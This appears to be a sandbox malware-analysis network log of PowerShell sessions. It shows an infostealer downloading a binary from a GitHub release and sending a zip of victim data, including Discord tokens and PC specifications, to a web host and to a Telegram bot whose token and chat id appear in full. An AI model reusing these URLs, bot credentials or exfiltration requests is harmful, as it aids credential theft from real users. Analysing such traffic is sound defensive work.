5d 2f 0e 77 91 14 15 50 c1 66 9c 0f e5 cb 6c bc 43 95 5e 76 99 d5 63 9f 3e b8 14 cc 3c f5 5b ab a0 c1 1c 1e 73 96 89 0e b6 90 ec 26 3d b3 82 Data Ascii: d@f%ainRnBvE!YW2voRmR\]U=WbX7}F&iFgr(0i#~7e)ou{'}@[ihFE!(]E-esq\|qmq]/wPflC^vc><[s&=
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 82 e4 5f 7c 51 67 87 80 d0 d6 e8 d8 45 e5 5c 70 a6 00 a9 a8 db 4c 5b c7 8d ad 94 ee 73 bd bf 7e 5a 7a 14 49 b3 8f 55 47 13 c2 e2 97 27 b2 d9 9a 0d 9d f8 03 b7 8e 62 eb e8 db d5 61 58 a1 d5 f8 b4 11 49 2c cd db c1 75 55 b1 36 d7 89 1f fb d2 6a c3 5f c2 cc 6a 1e 5c 37 4e 13 6b 00 46 93 84 ad 47 a4 ce 2c 34 b0 80 8a 50 83 d3 1e 2a 58 1d 46 92 8d 74 7d 53 b1 76 76 ea b6 f7 6c 92 94 9f f3 33 44 fa 29 fa a1 55 b3 7d de 7d 02 03 ce ca a7 d8 b0 ca 22 23 21 9b f2 20 48 4c 1f 03 5b 91 5c e6 45 2a 81 de 21 69 37 66 01 83 4f c8 05 ae cd da f3 f0 49 6f 8d b1 4d 6c 8e ad 07 df 43 a7 68 84 32 67 67 46 3f 7f 47 fc 81 af 2e 9a 55 63 b6 96 7d 85 58 96 59 ca 95 3f 63 82 3a 63 56 1e 69 91 24 ae 13 d7 56 76 a0 27 97 66 2d 8c 07 6e 42 f2 65 80 b1 bb 2b 99 24 33 fe 26 e1 45 a0 Data Ascii: _\|QgE\pL[s~ZzIUG'baXI,uU6j_j\7NkFG,4PXFt}Svvl3D)U}}"#! HL[\E!i7fOIoMlCh2ggF?G.Uc}XY?c:cVi$Vv'f-nBe+$3&E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49955	140.82.121.3	443	7968	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:48 UTC	191	OUT	GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com
2025-01-08 09:15:48 UTC	962	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:35 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:48 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49963	185.199.111.133	443	7968	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:49 UTC	624	OUT	GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com
2025-01-08 09:15:49 UTC	798	IN	HTTP/1.1 200 OK Connection: close Content-Length: 9790976 Content-Type: application/octet-stream Last-Modified: Tue, 26 Nov 2024 19:52:15 GMT ETag: "0x8DD0E53D3A2D426" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: bd8367b9-201e-004f-1c15-5f9001000000 x-ms-version: 2024-11-04 x-ms-creation-time: Tue, 26 Nov 2024 19:52:15 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=SryxenBuilt.bin x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Wed, 08 Jan 2025 09:15:49 GMT X-Served-By: cache-iad-kjyo7100021-IAD, cache-ewr-kewr1740054-EWR X-Cache: HIT, MISS X-Cache-Hits: 24, 0 X-Timer: S1736327749.388095,VS0,VE7
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 60 95 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 00 00 00 00 00 a2 8b 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 ee 49 00 00 ee 04 00 00 00 00 00 e0 22 07 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 10 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 95 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZERYHHH`!L!This program cannot be run in DOS mode.$PEd"I"@``
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 00 48 8d 04 d8 48 83 c4 10 5d c3 48 8d 05 68 3d 4c 00 48 8d 1d 21 24 59 00 90 e8 1b cf 03 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 e6 de 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 1c 10 48 85 c9 7c 16 be 01 00 00 00 d3 e6 48 83 f9 20 19 ff 21 fe 09 f3 88 1c 10 5d c3 e8 39 c1 03 00 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 14 10 48 85 c9 7c 16 bb 01 00 00 00 d3 e3 48 83 f9 20 19 f6 21 f3 84 d3 0f 95 c0 5d c3 e8 d9 c0 Data Ascii: HH]Hh=LH!$YHD$H\$HL$HD$H\$HL$UHHH?H=HHHHH)H\|H !]9UHHH?H=HHHHH)H\|H !]
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 48 83 c0 48 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 40 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 58 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 30 48 83 c4 08 5d c3 31 c0 48 83 c4 08 5d c3 48 89 44 24 08 e8 24 d9 06 00 48 8b 44 24 08 e9 1a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 91 00 00 00 55 48 89 e5 48 83 ec 08 48 89 44 24 18 e8 64 fc ff ff 0f 1f 40 00 48 83 f8 12 77 2a 48 83 f8 11 74 15 48 83 f8 12 75 34 48 8b 4c 24 18 48 8b 41 30 48 83 c4 08 5d c3 48 8b 4c 24 18 48 Data Ascii: HHH]HD$H@H]HD$H8H]HD$HPH]HD$HXH]HD$H8H]HD$H8H]HD$HPH]HD$H0H]1H]HD$$HD$I;fUHHHD$d@Hw*HtHu4HL$HA0H]HL$H
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 48 83 ec 08 48 89 5c 24 20 e8 c8 00 00 00 48 8b 4c 24 20 48 8b 04 c8 48 83 c4 08 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 2a d4 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5b 55 48 89 e5 48 83 ec 20 0f b6 50 14 f6 c2 01 bb 38 00 00 00 ba 48 00 00 00 48 0f 45 da 66 83 78 30 00 75 0d 31 c0 31 db 48 89 d9 48 83 c4 20 5d c3 48 89 44 24 30 48 8d 0d d1 8b 53 00 bf 0d 00 00 00 e8 b3 f8 ff ff 84 00 48 8b 54 24 30 0f b7 4a 30 48 89 cb 48 83 c4 20 5d c3 48 89 44 24 08 e8 95 d3 06 00 48 8b 44 24 08 eb 8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 94 00 00 00 55 48 89 e5 48 83 ec 28 48 89 44 24 38 e8 e4 fe ff ff 0f 1f 40 00 66 85 c0 75 0d 31 c0 31 db Data Ascii: HH\$ HL$ HH]HD$H\$*HD$H\$I;fv[UHH P8HHEfx0u11HH ]HD$0HSHT$0J0HH ]HD$HD$I;fUHH(HD$8@fu11
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 5d c3 48 8b 44 24 38 bb 01 00 00 00 e8 a3 fd ff ff 48 89 44 24 30 48 89 5c 24 28 48 8d 0c 03 48 8d 49 01 48 8b 44 24 38 48 89 cb e8 84 fd ff ff 48 89 5c 24 20 48 8b 4c 24 30 48 8b 54 24 28 48 01 d1 48 8d 0c 01 48 8d 49 01 48 8b 44 24 38 bf 10 00 00 00 48 89 cb 48 8d 0d a7 9c 53 00 e8 31 fc ff ff 48 8b 5c 24 20 48 85 db 7c 21 48 89 c1 48 f7 d9 90 48 39 cb 77 06 48 83 c4 40 5d c3 48 85 c0 74 05 e8 8b 5b 06 00 e8 c6 5b 06 00 e8 81 5b 06 00 90 48 89 44 24 08 e8 56 ce 06 00 48 8b 44 24 08 e9 2c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 f0 4d 3b 66 10 0f 86 46 03 00 00 55 48 89 e5 48 81 ec 88 00 00 00 48 89 84 24 98 00 00 00 48 89 8c 24 a8 00 00 00 48 81 fb 00 00 00 20 0f 8d dd 02 00 00 66 0f 1f 84 00 00 00 00 00 48 81 ff 00 00 00 20 0f 8d 89 02 Data Ascii: ]HD$8HD$0H\$(HHIHD$8HH\$ HL$0HT$(HHHIHD$8HHS1H\$ H\|!HHH9wH@]Ht[[[HD$VHD$,Ld$M;fFUHHH$H$H fH
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f2 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 52 c9 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f1 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 f2 c8 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 22 ec ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 92 c8 06 Data Ascii: I;fvUHHMf MuH]HD$RHD$Ll$fDM9,$uI$$I;fvUHHMf MuH]HD$HD$Ll$fDM9,$uI$$I;fvUHHMf Mu"H]HD$
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: cc d9 03 00 48 8b 74 24 50 48 8b 7c 24 78 66 90 e9 dd fd ff ff 48 8b 05 b4 bc 88 00 48 8b 0d b5 bc 88 00 eb 0b 48 83 c0 20 48 ff c9 0f 1f 40 00 48 85 c9 0f 8e 88 00 00 00 80 78 18 00 74 e6 0f b6 50 19 48 8b 58 10 84 d2 74 6f 80 3b 00 66 90 75 68 48 89 4c 24 50 48 89 44 24 70 48 8b 08 48 89 4c 24 78 48 8b 50 08 48 89 54 24 48 0f 1f 00 e8 fb d8 03 00 48 8d 05 7a f4 53 00 bb 19 00 00 00 e8 2a e1 03 00 48 8b 44 24 78 48 8b 5c 24 48 e8 1b e1 03 00 48 8d 05 64 de 53 00 bb 17 00 00 00 e8 0a e1 03 00 e8 25 d9 03 00 48 8b 44 24 70 48 8b 4c 24 50 e9 6b ff ff ff 88 13 e9 64 ff ff ff 48 83 ec 80 5d c3 49 8d 40 01 0f 1f 44 00 00 48 39 d0 0f 8d 80 00 00 00 49 89 c0 48 c1 e0 05 4c 8b 0d e9 bb 88 00 49 8b 4c 01 08 4d 8b 0c 01 48 39 f1 75 d2 4c 89 44 24 40 48 89 44 24 38 Data Ascii: Ht$PH\|$xfHHH H@HxtPHXto;fuhHL$PHD$pHHL$xHPHT$HHzS*HD$xH\$HHdS%HD$pHL$PkdH]I@DH9IHLILMH9uLD$@HD$8
2025-01-08 09:15:49 UTC	1378	IN	Data Raw: 21 4e 8b 8c 02 80 00 00 00 0f 1f 44 00 00 e8 fb dd 06 00 4d 89 0b 4e 8b 8c 02 90 00 00 00 4d 89 4b 08 4c 8d 0d 32 42 53 00 4e 89 8c 02 80 00 00 00 4c 8d 0d e7 5e 91 00 4e 89 8c 02 90 00 00 00 83 f8 03 0f 8d 07 02 00 00 48 8b 0d 2e b7 88 00 48 8b 1d 1f b7 88 00 48 83 c3 05 48 8b 15 0c b7 88 00 48 39 d9 73 48 48 89 d0 bf 05 00 00 00 48 8d 35 b8 c6 50 00 e8 93 0d 05 00 48 89 0d fc b6 88 00 83 3d 95 4e 91 00 00 74 16 0f 1f 00 e8 7b dd 06 00 49 89 03 48 8b 15 d1 b6 88 00 49 89 53 08 48 89 05 c6 b6 88 00 48 89 c2 8b 44 24 48 48 89 1d c0 b6 88 00 4c 8d 43 fb 49 c1 e0 05 4a c7 44 02 08 03 00 00 00 42 c6 44 02 18 00 42 c6 44 02 19 00 83 3d 44 4e 91 00 00 74 15 4e 8b 0c 02 e8 29 dd 06 00 4d 89 0b 4e 8b 4c 02 10 4d 89 4b 08 4c 8d 0d 6a 3c 53 00 4e 89 0c 02 4c 8d 0d Data Ascii: !NDMNMKL2BSNL^NH.HHHH9sHHH5PH=Nt{IHISHHD$HHLCIJDBDBD=DNtN)MNLMKLj<SNL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	50000	185.199.110.133	443	1916	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:58 UTC	95	OUT	GET /43a1723/test/main/Ip HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:59 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "636cb7e8207c08864115341ceca30eeff1d8d213b195904907133e4762b2cf2b" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 804F:15C3CE:437EFE:4A42F7:677E4246 Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:59 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890066-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736327759.734357,VS0,VE325 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 038c4812413c6d063ed034ed82032c66a90784f0 Expires: Wed, 08 Jan 2025 09:20:59 GMT Source-Age: 0
2025-01-08 09:15:59 UTC	17	IN	Data Raw: 30 58 39 33 42 39 44 44 31 38 3a 35 39 30 39 38 0a Data Ascii: 0X93B9DD18:59098

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	50005	107.180.236.211	443	1156	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:16:02 UTC	231	OUT	POST / HTTP/1.1 Host: sigma.dreamhosters.com User-Agent: Go-http-client/1.1 Content-Length: 949 Content-Type: multipart/form-data; boundary=a429db8ba6e209a67f5b6c6a167b81348539cf69a659139c87a73ec1b88a Accept-Encoding: gzip
2025-01-08 09:16:02 UTC	949	OUT	Data Raw: 2d 2d 61 34 32 39 64 62 38 62 61 36 65 32 30 39 61 36 37 66 35 62 36 63 36 61 31 36 37 62 38 31 33 34 38 35 33 39 63 66 36 39 61 36 35 39 31 33 39 63 38 37 61 37 33 65 63 31 62 38 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 46 52 4f 4e 54 44 7e 31 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 72 6f 6e 74 64 65 73 6b 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 64 69 73 Data Ascii: --a429db8ba6e209a67f5b6c6a167b81348539cf69a659139c87a73ec1b88aContent-Disposition: form-data; name="file"; filename="C:\\Users\\user~1\\AppData\\Local\\Temp\\\\user.zip"Content-Type: application/octet-streamPKdis
2025-01-08 09:16:02 UTC	276	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 09:16:02 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Cache-Control: max-age=600 Expires: Wed, 08 Jan 2025 09:26:02 GMT Vary: Accept-Encoding,User-Agent Content-Length: 114 Content-Type: text/html; charset=UTF-8
2025-01-08 09:16:02 UTC	114	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 69 6c 65 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 22 2c 22 66 69 6c 65 22 3a 22 75 70 6c 6f 61 64 73 5c 2f 65 64 37 64 62 32 37 31 38 61 62 36 64 37 38 33 36 38 63 65 30 32 34 33 36 62 34 66 64 37 61 36 2e 7a 69 70 22 7d Data Ascii: {"status":"success","message":"File uploaded successfully","file":"uploads\/ed7db2718ab6d78368ce02436b4fd7a6.zip"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	50010	149.154.167.220	443	7372	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:16:50 UTC	235	OUT	POST /bot7487418347:AAHo0dKeo0c-nZAiN9ZgiVPbyp4xTSdsV2E/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e1da44c9-2b1d-45a4-a865-297d217ee111" Host: api.telegram.org Content-Length: 1212 Connection: Keep-Alive
2025-01-08 09:16:50 UTC	40	OUT	Data Raw: 2d 2d 65 31 64 61 34 34 63 39 2d 32 62 31 64 2d 34 35 61 34 2d 61 38 36 35 2d 32 39 37 64 32 31 37 65 65 31 31 31 0d 0a Data Ascii: --e1da44c9-2b1d-45a4-a865-297d217ee111
2025-01-08 09:16:50 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-01-08 09:16:50 UTC	10	OUT	Data Raw: 37 30 35 36 31 37 34 35 34 30 Data Ascii: 7056174540
2025-01-08 09:16:50 UTC	147	OUT	Data Raw: 0d 0a 2d 2d 65 31 64 61 34 34 63 39 2d 32 62 31 64 2d 34 35 61 34 2d 61 38 36 35 2d 32 39 37 64 32 31 37 65 65 31 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 66 72 6f 6e 74 64 65 73 6b 2e 7a 69 70 0d 0a 0d 0a Data Ascii: --e1da44c9-2b1d-45a4-a865-297d217ee111Content-Disposition: form-data; name=document; filename=user.zip; filename*=utf-8''user.zip
2025-01-08 09:16:50 UTC	882	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 02 43 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 66 72 6f 6e 74 64 65 73 6b 5c 67 61 6d 65 73 5c 50 4b 03 04 14 00 00 00 00 00 02 43 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 66 72 6f 6e 74 64 65 73 6b 5c 53 6f 63 69 61 6c 4d 65 64 69 61 73 5c 50 4b 03 04 14 00 00 00 00 00 88 2e 28 5a 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 66 72 6f 6e 74 64 65 73 6b 5c 64 69 73 63 6f 72 64 5f 74 6f 6b 65 6e 73 2e 74 78 74 50 4b 03 04 14 00 00 00 08 00 89 2e 28 5a ca 15 f7 7c 66 01 00 00 38 02 00 00 20 00 00 00 66 72 6f 6e 74 64 65 73 6b 5c 70 63 5f 73 70 65 63 69 66 69 63 61 74 69 6f 6e 73 2e 6a 73 6f 6e 75 90 4f 6f 82 30 18 c6 ef 7e 8a 86 93 26 63 29 15 68 cb 69 fc 11 34 46 62 44 dd dc b2 03 42 cd c8 40 4c 81 Data Ascii: PKCZuser\games\PKCZuser\SocialMedias\PK.(Zuser\discord_tokens.txtPK.(Z\|f8 user\pc_specifications.jsonuOo0~&c)hi4FbDB@L
2025-01-08 09:16:50 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 31 64 61 34 34 63 39 2d 32 62 31 64 2d 34 35 61 34 2d 61 38 36 35 2d 32 39 37 64 32 31 37 65 65 31 31 31 2d 2d 0d 0a Data Ascii: --e1da44c9-2b1d-45a4-a865-297d217ee111--
2025-01-08 09:16:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 09:16:51 GMT Content-Type: application/json Content-Length: 476 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
